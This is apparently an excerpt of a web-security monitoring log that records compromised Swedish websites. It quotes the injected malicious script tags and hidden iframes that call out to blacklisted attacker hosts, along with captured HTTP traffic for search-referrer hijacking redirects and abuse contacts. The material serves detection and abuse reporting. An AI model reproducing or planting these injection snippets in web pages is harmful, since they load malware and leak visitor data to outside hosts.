keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://test.staow.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>neforetag.se is on 81.91.13.75<br>ASN for 81.91.13.75: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>rDNS not found for 81.91.13.75<br>Found address in whois: registry@cygate.se1472630549http://svendufva.se/ (31.216.35.60) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://triomphentrelikwieen.comparetheconveyancer.com/away/slice-shame-36038669&quot; width=&quot;264&quot; height=&quot;263&quot;&gt;<br><br>Offensive url: http://triomphentrelikwieen.comparetheconveyancer.com/away/slice-shame-36038669<br>Url is blacklisted in Google Safe Browsing<br><br>svendufva.se is on 31.216.35.60<br>ASN for 31.216.35.60: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.60 corresponds with shwl-0052.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0052.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1472629596http://beamingwhite.se/ (31.216.35.44) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://riamensen.at/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>beamingwhite.se is on 31.216.35.44<br>ASN for 31.216.35.44: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.44 corresponds with shwl-0051.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0051.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1472629136http://kunskapspriset.se/ (81.91.13.75) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://test.staow.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://test.staow.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://test.staow.com/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>kunskapspriset.se is on 81.91.13.75<br>ASN for 81.91.13.75: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>rDNS not found for 81.91.13.75<br>Found address in whois: registry@cygate.se1472628336http://svendufva.se/ (31.216.35.60) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://pizzaversiotamengelwe.fcislanders.com/admiration/wizard-defeat-trace-23055640&quot; width=&quot;269&quot; height=&quot;251&quot;&gt;<br><br>Offensive url: http://pizzaversiotamengelwe.fcislanders.com/admiration/wizard-defeat-trace-23055640<br>Url is blacklisted in Google Safe Browsing<br><br>svendufva.se is on 31.216.35.60<br>ASN for 31.216.35.60: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.60 corresponds with shwl-0052.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0052.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1472540129http://starkinterior.se/ (194.218.22.147) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>starkinterior.se is on 194.218.22.147<br>ASN for 194.218.22.147: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.218.22.147 corresponds with www18.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1471331028http://anderssoderlund.se/ (31.216.35.4) - Serp-hijackingAttacked url: http://anderssoderlund.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 11 Aug 2016 05:57:15 +0200<br><br>Visitors with referer are redirected to http://www.buyfifaing.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: anderssoderlund.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 137 <br>Content-Type: text/html <br>Expires: Thu, 11 Aug 2016 03:56:14 GMT <br>Location: index.asp?page=1 <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSSAATTRD=GLJPCLPBNGJFAOJCOINGKJMC; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Thu, 11 Aug 2016 03:57:13 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: anderssoderlund.se <br>Referer: http://www.google.com/search?q=anderssoderlund.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 147 <br>Content-Type: text/html <br>Location: http://www.buyfifaing.com/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSSAATTRD=FLJPCLPBFCAEAHEOJJGEJMFA; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Thu, 11 Aug 2016 03:57:13 GMT <br>Connection: close<br><br>anderssoderlund.se is on 31.216.35.4<br>ASN for 31.216.35.4: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.4 corresponds with shww-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shww-0040.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1470905271http://lund-hoistad.se/ (31.216.35.4) - Serp-hijackingAttacked url: http://lund-hoistad.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Thu, 11 Aug 2016 01:28:42 +0200<br><br>Visitors with referer are redirected to http://www.coins200.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: lund-hoistad.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 8327 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSQDBQTCA=LGKKFHGBMPPJJLHGEJAHFEBK; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Wed, 10 Aug 2016 23:27:25 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: lund-hoistad.se <br>Referer: http://www.google.com/search?q=lund-hoistad.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 145 <br>Content-Type: text/html <br>Location: http://www.coins200.com/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSQDBQTCA=KGKKFHGBGGPPLKFIMMMBPKDG; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Wed, 10 Aug 2016 23:27:25 GMT <br>Connection: close<br><br>lund-hoistad.se is on 31.216.35.4<br>ASN for 31.216.35.4: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.4 corresponds with shww-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shww-0040.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1470904493http://beamingwhite.se/ (31.216.35.44) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://riamensen.at/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>beamingwhite.se is on 31.216.35.44<br>ASN for 31.216.35.44: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.44 corresponds with shwl-0051.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0051.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1470902026http://aquelium.nu/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3341973&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3341973<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.nu is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1470818608http://petragunnarsson.se/ (31.216.35.3) - Serp-hijackingAttacked url: http://petragunnarsson.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 09 Aug 2016 13:27:46 +0200<br><br>Visitors with referer are redirected to http://247worldstorewrx.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 301 Moved Permanently <br>Date: Tue, 09 Aug 2016 11:27:42 GMT <br>Server: Apache/2.2.3 (CentOS) <br>X-Pingback: http://www.petragunnarsson.se/xmlrpc.php <br>Location: http://www.petragunnarsson.se/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html; charset=UTF-8 <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: petragunnarsson.se <br>Referer: http://www.google.com/search?q=petragunnarsson.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Moved Temporarily <br>Date: Tue, 09 Aug 2016 11:27:41 GMT <br>Server: Apache/2.2.3 (CentOS) <br>Location: http://247worldstorewrx.com/ <br>X-Powered-By: PleskLin <br>Connection: close <br>Content-Type: text/html<br><br>petragunnarsson.se is on 31.216.35.3<br>ASN for 31.216.35.3: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.3 corresponds with shwl-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0040.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1470811485http://starkinterior.se/ (194.218.22.147) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>starkinterior.se is on 194.218.22.147<br>ASN for 194.218.22.147: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.218.22.147 corresponds with www18.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1470811081http://aquelium.se/ (81.236.49.251) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://heirem-art.de/crpzw3bh.php?id=3342702&quot;&gt;<br><br>Offensive url: http://heirem-art.de/crpzw3bh.php?id=3342702<br>Url is blacklisted in Google Safe Browsing<br><br>aquelium.se is on 81.236.49.251<br>ASN for 81.236.49.251: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>81.236.49.251 corresponds with lb-win.webhosting.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1470810784http://beamingwhite.se/ (31.216.35.44) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://riamensen.at/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>beamingwhite.se is on 31.216.35.44<br>ASN for 31.216.35.44: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.44 corresponds with shwl-0051.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0051.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1470810680http://xn--lund-histad-wfb.se/ (31.216.35.4) - Serp-hijackingAttacked url: http://xn--lund-histad-wfb.se/<br>Attack type: SERP-hijacking (see http://ikyon.com/attack-types/ for description)<br>Attack detected Tue, 09 Aug 2016 08:51:47 +0200<br><br>Visitors with referer are redirected to http://www.coins200.com/ <br><br>HTTP traffic without referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: xn--lund-histad-wfb.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 200 OK <br>Cache-Control: private <br>Content-Length: 8327 <br>Content-Type: text/html <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSSTQQDAA=EAEBLMKAJEHAADOBOJPDIFIP; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Tue, 09 Aug 2016 06:50:31 GMT <br>Connection: close <br> <br><br>HTTP traffic with referer:<br>HTTP headers sent:<br>HEAD / HTTP/1.1 <br>Host: xn--lund-histad-wfb.se <br>Referer: http://www.google.com/search?q=xn--lund-histad-wfb.se <br>Connection: Close <br> <br>HTTP headers recieved:<br>HTTP/1.1 302 Object moved <br>Cache-Control: private <br>Content-Length: 145 <br>Content-Type: text/html <br>Location: http://www.coins200.com/ <br>Server: Microsoft-IIS/7.5 <br>Set-Cookie: ASPSESSIONIDSSTQQDAA=DAEBLMKAMFPLMNONLMMLEPEM; path=/ <br>X-Powered-By: ASP.NET <br>X-Powered-By-Plesk: PleskWin <br>Date: Tue, 09 Aug 2016 06:50:31 GMT <br>Connection: close<br><br>xn--lund-histad-wfb.se is on 31.216.35.4<br>ASN for 31.216.35.4: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.4 corresponds with shww-0040.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shww-0040.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1470810662http://beamingwhite.se/ (31.216.35.44) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://riamensen.at/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>beamingwhite.se is on 31.216.35.44<br>ASN for 31.216.35.44: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.44 corresponds with shwl-0051.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0051.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1468391353http://starkinterior.se/ (194.218.22.147) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>starkinterior.se is on 194.218.22.147<br>ASN for 194.218.22.147: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.218.22.147 corresponds with www18.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1468305396http://beamingwhite.se/ (31.216.35.44) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://riamensen.at/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://riamensen.at/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>beamingwhite.se is on 31.216.35.44<br>ASN for 31.216.35.44: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.44 corresponds with shwl-0051.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0051.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1467890450http://storheden.nu/ (194.117.171.77) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://89.161.161.77/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://89.161.161.77/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://89.161.161.77/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>storheden.nu is on 194.117.171.77<br>ASN for 194.117.171.77: 3301<br>Abusix contact information: itbd_lir@itnorrbotten.se (information only)<br>194.117.171.77 corresponds with w14.communique.se<br>Abuse.net does not have any reliable address for w14.communique.se<br>Found address in whois: lir@itnorrbotten.se1467788713http://bolles.nu/ (212.181.124.23) - MalwareOffensive html code:<br>&lt;iframe src=&quot;http://javachek.tk/505x&quot; width=&quot;1&quot; height=&quot;1&quot; align=&quot;left&quot;&gt;<br><br>Offensive url: http://javachek.tk/505x<br>Url is blacklisted in Google Safe Browsing<br><br>bolles.nu is on 212.181.124.23<br>ASN for 212.181.124.23: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>rDNS not found for 212.181.124.23<br>Found address in whois: abuse@telia.com1467722111http://ledarbetarskap.se/ (62.20.1.233) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>ledarbetarskap.se is on 62.20.1.233<br>ASN for 62.20.1.233: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>62.20.1.233 corresponds with www5.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1467711466http://starkinterior.se/ (194.218.22.147) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; src=&quot;http://realstatistics.info/js/analytic.php?id=4&quot;&gt;<br><br>Offensive url: http://realstatistics.info/js/analytic.php?id=4<br>Url is blacklisted in Google Safe Browsing<br><br>starkinterior.se is on 194.218.22.147<br>ASN for 194.218.22.147: 3301<br>Abusix contact information: abuse@telia.com (information only)<br>194.218.22.147 corresponds with www18.space2u.com<br>Abuse.net has 1 reliable address(es) for space2u.com<br>Found address(es): abuse@space2u.com1467709800http://scandi-flex.se/ (31.216.35.29) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>scandi-flex.se is on 31.216.35.29<br>ASN for 31.216.35.29: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.29 corresponds with shwl-0050.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0050.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1467708143http://euroenergylighting.se/ (195.198.5.2) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>euroenergylighting.se is on 195.198.5.2<br>ASN for 195.198.5.2: 3301<br>Abusix contact information: (information only)<br>195.198.5.2 corresponds with 195-198-5-2.customer.telia.com<br>Abuse.net has 1 reliable address(es) for telia.com<br>Found address(es): abuse@telia.com1467707659http://alternativtrafik.se/ (31.216.35.29) - MalwareOffensive html code:<br>&lt;script language=&quot;JavaScript&quot; type=&quot;text/JavaScript&quot; src=&quot;http://realstatistics.pro/js/analytics.php?id=123&quot;&gt;<br><br>Offensive url: http://realstatistics.pro/js/analytics.php?id=123<br>Url is blacklisted in Google Safe Browsing<br><br>alternativtrafik.se is on 31.216.35.29<br>ASN for 31.216.35.29: 3301<br>Abusix contact information: registry@cygate.se, abuse@ipeer.se (information only)<br>31.216.35.29 corresponds with shwl-0050.s.thehostingplatform.com<br>Abuse.net does not have any reliable address for shwl-0050.s.thehostingplatform.com<br>Found address in whois: registry@cygate.se1467707562http://storheden.nu/ (194.117.171.77) - MalwareOffensive html code:<br>&lt;script type=&quot;text/javascript&quot; src=&quot;http://daisyworld.co.za/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm='+encodeURIComponent('http://daisyworld.co.za/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x&lt;y;x++){if(metas[x].name.toLowerCase()==&quot;keywords&quot;){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&amp;]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&amp;se_referrer='+encodeURIComponent(document.referrer)+'&amp;source='+encodeURIComponent(window.location.host))+'&quot;&gt;<br><br>Offensive url: http://daisyworld.co.za/js/jquery.min.php?c_utt=SWR2D2&amp;c_utm=<br>Url is blacklisted in Google Safe Browsing<br><br>storheden.nu is on 194.117.171.77<br>ASN for 194.117.171.77: 3301<br>Abusix contact information: itbd_lir@itnorrbotten.se (information only)<br>194.117.171.77 corresponds with w14.communique.se<br>Abuse.net does not have any reliable address for w14.communique.se<br>Found address in whois: lir@itnorrbotten.se1467707409